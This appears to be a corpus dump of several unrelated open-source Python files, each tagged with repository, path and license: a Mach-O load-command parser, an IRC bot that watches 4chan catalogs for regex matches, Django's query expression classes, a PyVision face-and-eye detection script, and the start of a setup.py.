class ident_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_IDENT
self.cmdsize = v_uint32() # strings that follow this command
class fvmfile_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_FVMFILE
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # files pathname
self.header_addr = v_uint32() # files virtual address
command_classes = {
LC_SEGMENT: segment_command,
LC_SYMTAB: symtab_command,
LC_LOAD_DYLIB: dylib_command,
}
def getCommandClass(cmdtype):
cls = command_classes.get(cmdtype)
    if cls is not None:
return cls
return load_command
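def parseLoadCommands(bytes, offset, ncmds):
    '''
    Illustrative sketch (not part of the original module): walk ncmds load
    commands starting at the given file offset, dispatching each one to the
    structure registered in command_classes.  The helper name and arguments
    are hypothetical; it only relies on the generic load_command struct
    exposing cmd/cmdsize and on vsParse() as used above.
    '''
    commands = []
    for i in range(ncmds):
        lc = load_command()
        lc.vsParse(bytes, offset=offset)
        cls = getCommandClass(lc.cmd)
        cmd = cls()
        cmd.vsParse(bytes, offset=offset)
        commands.append(cmd)
        offset += lc.cmdsize
    return commands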
| gpl-2.0 |
TheCrittaC/BigBen | modules/static/fourchanmonitor.py | 1 | 2518 | import irc
import json
from urllib import urlopen
import BeautifulSoup
import HTMLParser
import thread
from time import sleep
from re import sub, search
import traceback
class fourchanmonitor:
def __init__(self, connection):
self.connection = connection
monitorFile = open("./modules/static/ThreadMonitor", 'r')
monitorList = monitorFile.read().splitlines()
monitorFile.close()
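        # Each ThreadMonitor line is expected to hold four ' :: '-separated
        # fields: channel, board, regex, update interval in seconds, e.g.
        #   #example :: g :: some\s+regex :: 120
        # (the channel/board/regex values above are purely illustrative)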
for item in monitorList:
splitInfo = item.split(' :: ')
channel = splitInfo[0]
board = splitInfo[1]
regex = splitInfo[2]
updateInterval = int(splitInfo[3])
thread.start_new_thread(self.watchThreads,
(channel, board, regex,
updateInterval, self.connection))
def watchThreads(self, channel, board, regex,
updateInterval, connection):
oldPostNum = 0
postNum = 0
while 1:
try:
content = json.load(urlopen("http://a.4cdn.org/%s/catalog.json" % board))
for i in range(len(content)):
for athread in content[i]["threads"]:
comment = ""
subject = ""
try:
comment = athread["com"]
except KeyError:
break
try:
subject = athread["sub"]
except KeyError:
pass
                        # group the two searches so the "newer than last seen
                        # post" check applies to a match in either field
                        if ((search('(?i)%s' % regex, comment)
                                or search('(?i)%s' % regex, subject))
                                and int(athread["no"]) > postNum):
oldPostNum = postNum
postNum = int(athread["no"])
output = ("Found new thread matching %s - http://boards.4chan.org/%s/res/%s - %s"
% (regex, board, athread["no"], athread["com"][:50]))
output = (HTMLParser.HTMLParser().unescape(output)).encode('utf-8')
if oldPostNum != 0:
connection.privmsg(channel, output)
break
if oldPostNum != postNum:
break
except:
return
sleep(updateInterval)
| gpl-2.0 |
frishberg/django | django/db/models/expressions.py | 16 | 31921 | import copy
import datetime
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.query_utils import Q
from django.utils import six
from django.utils.functional import cached_property
class Combinable(object):
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return CombinedExpression(other, connector, self)
return CombinedExpression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rdiv__(self, other): # Python 2 compatibility
return type(self).__rtruediv__(self, other)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class BaseExpression(object):
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
_output_field = None
def __init__(self, output_field=None):
if output_field is not None:
self._output_field = output_field
def get_db_converters(self, connection):
return [self.convert_value] + self.output_field.get_db_converters(connection)
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else (
F(arg) if isinstance(arg, six.string_types) else Value(arg)
) for arg in expressions
]
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(Expression, self).as_sql(compiler, connection)
setattr(Expression, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
@cached_property
def contains_column_references(self):
for expr in self.get_source_expressions():
if expr and expr.contains_column_references:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
* for_save: whether this expression about to be used in a save or update
Returns: an Expression to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
c.set_source_expressions([
expr.resolve_expression(query, allow_joins, reuse, summarize)
for expr in c.get_source_expressions()
])
return c
def _prepare(self, field):
"""
Hook used by Lookup.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here. This isn't always correct, but it makes sense most of the
time.
Consider the difference between `2 + 2` and `2 / 3`. Inferring
the type here is a convenience for the common case. The user should
supply their own output_field with more complex computations.
If a source does not have an `_output_field` then we exclude it from
this check. If all sources are `None`, then an error will be thrown
higher up the stack in the `output_field` property.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
for source in sources:
if self._output_field is None:
self._output_field = source
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, expression, connection, context):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def get_group_by_cols(self):
if not self.contains_aggregate:
return [self]
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
def reverse_ordering(self):
return self
def flatten(self):
"""
Recursively yield this expression and all subexpressions, in
depth-first order.
"""
yield self
for expr in self.get_source_expressions():
if expr:
for inner_expr in expr.flatten():
yield inner_expr
class Expression(BaseExpression, Combinable):
"""
An expression that can be combined with other expressions.
"""
pass
class CombinedExpression(Expression):
def __init__(self, lhs, connector, rhs, output_field=None):
super(CombinedExpression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self)
def __str__(self):
return "{} {} {}".format(self.lhs, self.connector, self.rhs)
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField') or
(rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
if (lhs_output and rhs_output and self.connector == self.SUB and
lhs_output.get_internal_type() in {'DateField', 'DateTimeField', 'TimeField'} and
                lhs_output.get_internal_type() == rhs_output.get_internal_type()):
return TemporalSubtraction(self.lhs, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
class DurationExpression(CombinedExpression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
else:
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class TemporalSubtraction(CombinedExpression):
def __init__(self, lhs, rhs):
super(TemporalSubtraction, self).__init__(lhs, self.SUB, rhs, output_field=fields.DurationField())
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
lhs = compiler.compile(self.lhs, connection)
rhs = compiler.compile(self.rhs, connection)
return connection.ops.subtract_temporals(self.lhs.output_field.get_internal_type(), lhs, rhs)
class F(Combinable):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
class Func(Expression):
"""
An SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
arity = None # The number of arguments the function accepts.
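    # Illustrative sketch (not part of the original source): a database
    # function is typically exposed by subclassing Func and naming the SQL
    # function, e.g.
    #   class Lower(Func):
    #       function = 'LOWER'
    #       arity = 1
    # which renders as LOWER(<expression>) through the template above.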
def __init__(self, *expressions, **extra):
if self.arity is not None and len(expressions) != self.arity:
raise TypeError(
"'%s' takes exactly %s %s (%s given)" % (
self.__class__.__name__,
self.arity,
"argument" if self.arity == 1 else "arguments",
len(expressions),
)
)
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def __repr__(self):
args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
if extra:
return "{}({}, {})".format(self.__class__.__name__, args, extra)
return "{}({})".format(self.__class__.__name__, args)
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
data = self.extra.copy()
data.update(**extra_context)
# Use the first supplied value in this order: the parameter to this
# method, a value supplied in __init__()'s **extra (the value in
# `data`), or the value defined on the class.
if function is not None:
data['function'] = function
else:
data.setdefault('function', self.function)
template = template or data.get('template', self.template)
arg_joiner = arg_joiner or data.get('arg_joiner', self.arg_joiner)
data['expressions'] = data['field'] = arg_joiner.join(sql_parts)
return template % data, params
def as_sqlite(self, compiler, connection):
sql, params = self.as_sql(compiler, connection)
try:
if self.output_field.get_internal_type() == 'DecimalField':
sql = 'CAST(%s AS NUMERIC)' % sql
except FieldError:
pass
return sql, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(Expression):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.value)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
val = self.value
# check _output_field to avoid triggering an exception
if self._output_field is not None:
if self.for_save:
val = self.output_field.get_db_prep_save(val, connection=connection)
else:
val = self.output_field.get_db_prep_value(val, connection=connection)
if val is None:
# cx_Oracle does not always convert None to the appropriate
# NULL type (like in case expressions using numbers), so we
# use a literal SQL NULL
return 'NULL', []
return '%s', [val]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.for_save = for_save
return c
def get_group_by_cols(self):
return []
class DurationValue(Value):
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
if (connection.features.has_native_duration_field and
connection.features.driver_supports_timedelta_args):
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
def __init__(self, sql, params, output_field=None):
if output_field is None:
output_field = fields.Field()
self.sql, self.params = sql, params
super(RawSQL, self).__init__(output_field=output_field)
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)
def as_sql(self, compiler, connection):
return '(%s)' % self.sql, self.params
def get_group_by_cols(self):
return [self]
class Star(Expression):
def __repr__(self):
return "'*'"
def as_sql(self, compiler, connection):
return '*', []
class Random(Expression):
def __init__(self):
super(Random, self).__init__(output_field=fields.FloatField())
def __repr__(self):
return "Random()"
def as_sql(self, compiler, connection):
return connection.ops.random_function_sql(), []
class Col(Expression):
contains_column_references = True
def __init__(self, alias, target, output_field=None):
if output_field is None:
output_field = target
super(Col, self).__init__(output_field=output_field)
self.alias, self.target = alias, target
def __repr__(self):
return "{}({}, {})".format(
self.__class__.__name__, self.alias, self.target)
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
def get_db_converters(self, connection):
if self.target == self.output_field:
return self.output_field.get_db_converters(connection)
return (self.output_field.get_db_converters(connection) +
self.target.get_db_converters(connection))
class Ref(Expression):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.refs, self.source = refs, source
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
# The sub-expression `source` has already been resolved, as this is
# just a reference to the name of `source`.
return self
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % connection.ops.quote_name(self.refs), []
def get_group_by_cols(self):
return [self]
class ExpressionWrapper(Expression):
"""
An expression that can wrap another expression so that it can provide
extra context to the inner expression, such as the output_field.
"""
def __init__(self, expression, output_field):
super(ExpressionWrapper, self).__init__(output_field=output_field)
self.expression = expression
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
return self.expression.as_sql(compiler, connection)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.expression)
class When(Expression):
template = 'WHEN %(condition)s THEN %(result)s'
def __init__(self, condition=None, then=None, **lookups):
if lookups and condition is None:
condition, lookups = Q(**lookups), None
if condition is None or not isinstance(condition, Q) or lookups:
raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
super(When, self).__init__(output_field=None)
self.condition = condition
self.result = self._parse_expressions(then)[0]
def __str__(self):
return "WHEN %r THEN %r" % (self.condition, self.result)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return [self.condition, self.result]
def set_source_expressions(self, exprs):
self.condition, self.result = exprs
def get_source_fields(self):
# We're only interested in the fields of the result expressions.
return [self.result._output_field_or_none]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
if hasattr(c.condition, 'resolve_expression'):
c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = extra_context
sql_params = []
condition_sql, condition_params = compiler.compile(self.condition)
template_params['condition'] = condition_sql
sql_params.extend(condition_params)
result_sql, result_params = compiler.compile(self.result)
template_params['result'] = result_sql
sql_params.extend(result_params)
template = template or self.template
return template % template_params, sql_params
def get_group_by_cols(self):
# This is not a complete expression and cannot be used in GROUP BY.
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
class Case(Expression):
"""
An SQL searched CASE expression:
CASE
WHEN n > 0
THEN 'positive'
WHEN n < 0
THEN 'negative'
ELSE 'zero'
END
"""
template = 'CASE %(cases)s ELSE %(default)s END'
case_joiner = ' '
def __init__(self, *cases, **extra):
if not all(isinstance(case, When) for case in cases):
raise TypeError("Positional arguments must all be When objects.")
default = extra.pop('default', None)
output_field = extra.pop('output_field', None)
super(Case, self).__init__(output_field)
self.cases = list(cases)
self.default = self._parse_expressions(default)[0]
self.extra = extra
def __str__(self):
return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return self.cases + [self.default]
def set_source_expressions(self, exprs):
self.cases = exprs[:-1]
self.default = exprs[-1]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, case in enumerate(c.cases):
c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def copy(self):
c = super(Case, self).copy()
c.cases = c.cases[:]
return c
def as_sql(self, compiler, connection, template=None, case_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
if not self.cases:
return compiler.compile(self.default)
template_params = self.extra.copy()
template_params.update(extra_context)
case_parts = []
sql_params = []
for case in self.cases:
try:
case_sql, case_params = compiler.compile(case)
except EmptyResultSet:
continue
case_parts.append(case_sql)
sql_params.extend(case_params)
default_sql, default_params = compiler.compile(self.default)
if not case_parts:
return default_sql, default_params
case_joiner = case_joiner or self.case_joiner
template_params['cases'] = case_joiner.join(case_parts)
template_params['default'] = default_sql
sql_params.extend(default_params)
template = template or template_params.get('template', self.template)
sql = template % template_params
if self._output_field_or_none is not None:
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
class OrderBy(BaseExpression):
template = '%(expression)s %(ordering)s'
def __init__(self, expression, descending=False):
self.descending = descending
if not hasattr(expression, 'resolve_expression'):
raise ValueError('expression must be an expression type')
self.expression = expression
def __repr__(self):
return "{}({}, descending={})".format(
self.__class__.__name__, self.expression, self.descending)
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
expression_sql, params = compiler.compile(self.expression)
placeholders = {
'expression': expression_sql,
'ordering': 'DESC' if self.descending else 'ASC',
}
placeholders.update(extra_context)
template = template or self.template
return (template % placeholders).rstrip(), params
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def reverse_ordering(self):
self.descending = not self.descending
return self
def asc(self):
self.descending = False
def desc(self):
self.descending = True
| bsd-3-clause |
Dfred/concept-robot | HRI/vision/pyvision_0.9.0/src/pyvision/tools/face_scan.py | 7 | 8214 | # PyVision License
#
# Copyright (c) 2006-2008 David S. Bolme
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This tool scans a directory for image files and detects faces and eyes in those
images. A CSV file is generated containing one row per face detection, with
the detection rectangle and the ASEF eye coordinates for that detection.
'''
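# Example invocation (illustrative; directory and file names are hypothetical):
#   python face_scan.py --scale=0.5 --log=./annotated ./images detections.csv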
import optparse
import csv
import os
import pyvision as pv
from pyvision.face.CascadeDetector import CascadeDetector
from pyvision.face.FilterEyeLocator import FilterEyeLocator
import PIL
import random
EXTENSIONS = ["PGM","PPM","BMP","JPG","JPEG","GIF","PNG","TIF","TIFF"]
def parseOptions():
usage = "usage: %prog [options] <image_directory> <output.csv>"
parser = optparse.OptionParser(usage)
parser.add_option("--rotate", dest="rotate",default=False,
action="store_true",
help="Used to detection faces in images where the camera was turn while taking the photo. Tests all four rotations.")
parser.add_option("--scale", dest="scale",default=1.0,type='float',
help="Rescale the image before detection to improve performance.")
parser.add_option("--extension", dest="extension",default=None,
help="Attempt to process images with this extension.")
parser.add_option("--log", dest="log_dir",default=None,
help="Create a directory containing annotated images.")
parser.add_option("--log-scale", dest="log_scale",default=1.0,type='float',
help="Rescale images before they are logged.")
parser.add_option("--sample", dest="sample",default=None,type='int',
help="Randomly sample n images to process.")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Turn on more verbose output.")
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("This program requires two arguments: a directory containing images and the name of a file to use for output.")
return options, args
def processFaces(im,face_detect,locate_eyes):
# Run face detection
faces = face_detect(im)
return locate_eyes(im,faces)
#results = []
#i = 0
#for face in faces:
# Run eye detection
# affine = pv.AffineFromRect(face, (128, 128))
# face_im = affine.transformImage(im)
# cv_im = face_im.asOpenCVBW()
# eye1, eye2, corr1, corr2 = locate_eyes.locateEyes(cv_im)
# eye1, eye2 = affine.invertPoints([pv.Point(eye1), pv.Point(eye2)])
# results.append([face,eye1,eye2])
# i += 1
#
#return results
if __name__ == "__main__":
# Read in program arguments and options.
options, args = parseOptions()
#locator_filename = os.path.join(csu.__path__[0],'data','EyeLocatorASEF128x128.fel')
# Scan the directory for image files.
image_names = []
for dirpath, dirnames, filenames in os.walk(args[0]):
for filename in filenames:
extension = filename.split('.')[-1]
extension = extension.upper()
if (options.extension==None and extension in EXTENSIONS) or (options.extension != None and options.extension.upper() == extension):
pathname = os.path.join(dirpath,filename)
image_names.append(pathname)
# If an integer is passed to the sample option then subselect the image names.
if options.sample != None:
image_names = random.sample(image_names,options.sample)
# Open the file to use as output.
f = open(args[1],'wb')
csv_file = csv.writer(f)
headers = ['image_name','detect_number','detect_x','detect_y','detect_width','detect_height','eye1_x','eye1_y','eye2_x','eye2_y']
csv_file.writerow(headers)
# Create an image log if this is being saved to a file.
ilog = None
if options.log_dir != None:
print "Creating Image Log..."
ilog = pv.ImageLog(options.log_dir)
# For each image run face and eye detection
face_detect = CascadeDetector(image_scale=1.3*options.scale)
locate_eyes = FilterEyeLocator()#locator_filename)
c = 0
for pathname in image_names:
c += 1
im = pv.Image(pathname)
scale = options.log_scale
log_im = pv.AffineScale(scale,(int(scale*im.width),int(scale*im.height))).transformImage(im)
results = processFaces(im,face_detect,locate_eyes)
if options.rotate:
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_90))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(im.width-face.y-face.h, face.x, face.h, face.w),
pv.Point(im.width-eye1.Y(),eye1.X()),
pv.Point(im.width-eye2.Y(),eye2.X())])
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_180))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(im.width - face.x - face.w, im.height-face.y-face.h, face.w, face.h),
pv.Point(im.width-eye1.X(),im.height-eye1.Y()),
pv.Point(im.width-eye2.X(),im.height-eye2.Y())])
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_270))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(face.y, im.height-face.x-face.w, face.h, face.w),
pv.Point(eye1.Y(),im.height-eye1.X()),
pv.Point(eye2.Y(),im.height-eye2.X())])
n_faces = 0
for face,eye1,eye2 in results:
csv_file.writerow([pathname,n_faces,face.x,face.y,face.w,face.h,eye1.X(),eye1.Y(),eye2.X(),eye2.Y()])
if ilog != None:
log_im.annotateRect(scale*face)
log_im.annotatePoint(scale*eye1)
log_im.annotatePoint(scale*eye2)
n_faces += 1
#else:
# csv_file.writerow([pathname,"NA","NA","NA","NA","NA","NA","NA","NA","NA"])
print "Processed %5d of %d: [%2d faces] %s "%(c,len(image_names),n_faces,pathname)
if ilog != None:
basename = os.path.basename(pathname)
basename = basename.split('.')[0]
ilog.log(log_im,label=basename)
if ilog != None:
ilog.show()
| gpl-3.0 |
christophreimer/pytesmo | setup.py | 1 | 8410 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for pytesmo.
